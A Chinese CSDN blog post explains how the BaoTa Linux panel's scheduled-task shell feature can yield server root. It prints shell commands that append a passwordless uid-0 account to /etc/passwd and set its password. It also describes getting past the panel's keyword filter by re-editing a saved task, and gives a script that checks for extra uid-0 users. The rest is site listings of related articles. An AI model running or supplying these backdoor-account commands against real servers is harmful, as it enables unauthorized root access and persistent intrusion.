宝塔开启root_宝塔linux面板获取服务器root权限方法。(非漏洞BUG)

最新推荐文章于 2024-04-29 11:38:48 发布
最新推荐文章于 2024-04-29 11:38:48 发布
阅读量3.5k 收藏
点赞数
文章标签: 宝塔开启root
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39960147/article/details/111812114
版权

宝塔linux面板安全吗?这个问题大家都很担心,毕竟作为线上生产环境一旦出现问题相当麻烦。

2017/5/24更新宝塔linux面板获取服务器root权限方法。

宝塔的出现更多是为了方便对linux不熟悉的用户

计划任务中支持shell脚本 经测试可以通过计划任务获取服务器root权限。

如果一旦被非法获取到宝塔面板后台登录资料服务器将岌岌可危

shell内容:

echo "wwwtiewwcom::0:0::/:/bin/bash" >> /etc/passwd

echo "www.tieww.com" | passwd --stdin wwwtiewwcom > /dev/null

完事后就可以使用wwwtiewwcom登录系统。

2017/5/24更新

据官方透露计划任务shell在新版已经无法通过shell代码进行提权,真的不能提权了吗?

然而铁网维在最新版本: 4.2.1中测试提交shell代码发现一些重要关键词已经被过滤,当我重新编辑保存时发现shell代码重要关键词并没有做过滤。

如下图:过滤了:passwd  –stdin

当我们添加计划任务后再重新编辑保存,点击执行打开执行日志 如下图:

成功添加管理员wwwtiewwcom,存在的管理员有:root wwwtiewwcom

判断shell如下:

mesg=`awk -F: '($3 == 0) { print $1 }' /etc/passwd|grep -v root`

mesg1=`awk -F: '($3 == 0) { print $1 }' /etc/passwd`

if [ -z $mesg ]

then

echo "There don't have other user uid=0"

else

echo "$mesg添加成功"

echo "系统管理员:$mesg1"

fi

服务器root权限顺利带走,最后声明本获取root方法并非宝塔面板设计缺陷漏洞bug,而是宝塔是为了面板的易用性。

本教程由铁网维原创出品 服务器运维官方网址http://www.tieww.com 欢迎大家多多关注本站 感谢大家的支持。

weixin_39960147
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
宝塔mysql root远程登录权限
xiangshanqishi的专栏
01-12 4810
mysql7以下做一下两步操作 1. GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY '123456' 这里的123456为你给新增权限用户设置的密码,%代表所有主机,也可以具体到你的主机ip地址 2.flush privileges; 这一步一定要做,不然无法成功! 这句表示从mysql数据库的grant表中重新加载权限数据 mysql8.0以后已经不支持,所以必须先创建用户,然后再授权,命令如下: mysql> CREAT
宝塔终端切换root用户为www
will_csdn_go的博客
05-19 2359
sudo su - www -s /bin/bash
shell脚本中使用root权限
热门推荐
我的blog屋
11-06 1万+
方法一:使用expect 参考博客:https://www.cnblogs.com/linuxAndMcu/p/11127787.html#_label1 #!/usr/expect/bin/expect -f set timeout=5 #设置5秒超时 #下面几行后面不能添加注释,否则会异常 #send "exit\r" - exit命令:会退出root账号,成为普通用户 spawn su - root expect "密码:" send "zlkj\r" send "pwd\r" #send "exi
宝塔面板Windows提权方法_提权访问宝塔配置文件
最新发布
2401_84252820的博客
04-29 391
这种情况可以从里面读取一些敏感信息,比如mysql的root密码,而一般这个配置的不会只有这个文件可读,可以使用其他方法。盐:密码:可以直接使用,脚本会自动新建一个账号
宝塔配置允许MySQL8授权允许root用户远程连接
zz_lkw的博客
12-05 2052
第一步,使用mysql命令连接你的MySQL服务。 第二步: 第三部、修改验证模式 第四部 第五步 记得云服务器宝塔服务器上的数据库端口同时打开
拥有宝塔后部署web项目
qq_43619628的博客
11-20 359
1.创建数据库 访问权限:所有人 tips注意这里数据库名只能和用户名一样,所以你的配置文件可能需要修改。 还有点管理时出现502的错误:phpmyadmin无法使用。 1.查看放没放相应端口,有人说把phpmyadmin的端口改为8088,这个我没弄好。 2.直接卸载当前phpmyadmin,下载phpmyadmin5.0,它需要php7.1的支持。(这个改完我直接可以用了) 2.导入war包 找到/www/server/tomcat/webapps/ROOTROOT里的文件删掉,导入web应用的w
宝塔面板使用WWW用户执行计划任务命令 解决laravel/thinkphp日志权限问题
大华的程序人生
06-03 1370
宝塔面板的计划任务默认执行用户是root,如果任务里有打印日志的操作,则自动创建的log文件也是root用户权限,而php的运行用户是www,对root用户创建的文件默认没有写权限,进而导致程序报错。
宝塔面板使用WWW用户执行计划任务命令 解决laravel日志权限问题 宝塔设置计划任务执行用户
gaoxu529的专栏
05-24 2135
宝塔面板使用WWW用户执行计划任务命令 解决laravel日志权限问题 宝塔设置计划任务执行用户 问题背景 宝塔面板的计划任务默认执行用户是root,如果任务里有打印日志的操作,则自动创建的log文件也是root用户权限,而php的运行用户是www,对root用户创建的文件默认没有写权限,进而导致程序报错。 问题场景 此问题常见于laravel、FastAdmin等框架系统。 解决方案 可以使用 su -c 和 -s 搭配操作,为计划任务指定执行用户,来解决此问题。 su -c " {你要执
服务器安装宝塔面板无法远程连接数据库的解决方法
01-20
在搭建个人网站的过程中,使用了腾讯云的Linux服务器并安装了宝塔Linux面板来简化管理。宝塔面板提供了一个图形化的界面,使得不熟悉Linux服务器的用户也能方便地配置环境和管理服务。在安装网站程序时,特别是选择...
BT宝塔Linux服务器管理助手架设VPS面板(安装及初始设置应用)
09-15
主要介绍了BT宝塔Linux服务器管理助手架设 面板也是就是BT宝塔助手安装及初始设置应用演示,需要的朋友可以参考下
宝塔面板linux版装在/www以外的目录的方法
09-15
宝塔安装完整环境基本5个G没有了,用了不到几个月,随着日志文件等乱七八糟的东西增加,面板就提示根目录低于1个G,随后mysql就莫名其妙挂掉,这里就为大家分享一下将面板安装到别的目录的方法
linux下获得root权限运行程序
BILLINU的专栏
07-29 6845
linux下系统的默认root用户是不被启用的,这和MS windows的做法恰恰相反,windows XP却是安装好系统好,就给你创建一个自动登录的管理员用户,不过Linux不一样的这一点也大大地增加了系统的安全性,但同时对我们的操作使用有了些特别的要 求,下面我们就来给刚接触linux的来说说root权限的获得 推荐只有当要修改系统设置,或安装软件时才使用root用户的权限。 一
Linux专题_01】宝塔面板安装及运维
weixin_40736233的博客
10-14 2031
linux优雅系列 | 组件部署】宝塔面板安装及运维,主要是提供文档资料给初学者快速上手! 欢迎评论区或者私信交流,碰撞更多技术idea!!!
宝塔的mysql配置root访问
nocoah的博客
05-27 1194
4、查看效果 select host, user, authentication_string, plugin from user;2、接着授权 grant all on *.* to 'root'@'%' with grant option;3、刷新配置 flush privileges;sql语句最后的“;
腾讯云服务器修改为root登录安装宝塔面板
满堂花醉三千客,一剑霜寒十四州
08-08 3011
之前用的香港服务器,想换成大陆的,买了腾讯云的服务器。和别的云稍有不同,腾讯云服务器安装Linux服务器时,登录名被默认设置为ubuntu,而禁止使用root。腾讯云的远程登录,支持一键登录、VNC登录和ssh登录。一键登录:在腾讯云控制台,服务器详情页面即可登录。毕竟你自己买的服务器,肯定随便登录撒,要什么密码。此种方式也是在浏览器中新打开一个登录页面,支持复制粘贴。VNC登录:在浏览器界面远程登录,这里要输入你的用户名和密码,这个页面不支持复制粘贴。.........
解决宝塔mysql 远程root 无法连接问题
weixin_44678368的博客
11-17 745
宝塔mysql 远程root 无法连接
宝塔mysql增加root远程登录
过眼云烟—了凡
03-05 1万+
用了好久的宝塔,一直是单数据库登陆维护,今天在网上找到了群体维护的方法,因为root账号设置的是不能远程访问。 但因为是自己的测试服务器,就要改一下了,方便一点,经测试,成功: 1. GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY '123456' 这里的123456为你给新增权限用户设置的密码,%代表所有主机,也可以具体到...
宝塔面板允许Navicat for MySQL使用root账号远程连接mysql数据库
美奇软件开发工作室
07-15 7763
导读: 宝塔的mysql数据库默认可视化工具是phpMyAdmin,对于用习惯Navicat for MySQL的朋友来说,phpMyAdmin使用起来真心费劲,当我们使用Navicat for MySQL远程连接数据库时,发现 root超级管理账号是不能用来连接的,提示: ...
宝塔mysql外网链接开放root用户
Wrry_L先生
05-13 1239
1.进入mysql 2.GRANT ALL PRIVILEGES ON . TO ‘root’@’%’ IDENTIFIED BY ‘root’ 开放root 用户 3.flush privileges 刷新用户权限 4.记得开放宝塔数据库端口和服务器数据库端口
linux服务器如何安装宝塔面板
04-01
1. 下载宝塔面板安装包 首先,你需要从宝塔官网下载安装包,地址为 https://www.bt.cn/download/linux.html 。 2. 安装宝塔面板 将下载好的安装包上传到服务器上,并解压到指定目录(比如 /tmp 目录): tar -zxvf BT-panel-7.4.3.tar.gz -C /tmp 切换到解压后的目录并执行安装脚本: cd /tmp/bt-panel-7.4.3 bash install.sh 安装过程中会提示输入管理员账号和密码,这里需要输入一个用于登录宝塔面板账号和密码。 3. 配置防火墙 如果你的服务器开启了防火墙,需要打开宝塔面板所需的端口,包括 20、21、80、443、888、8888、8889、39000-40000 等端口。 4. 登录宝塔面板 安装完成后,可以在浏览器中输入服务器的IP地址或域名,然后在登录页面输入管理员账号和密码进行登录。 总结 安装宝塔面板常简单,只需下载安装包并执行安装脚本即可。在使用宝塔面板前,需要确保服务器已经打开所需的端口,否则无法正常使用宝塔面板

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值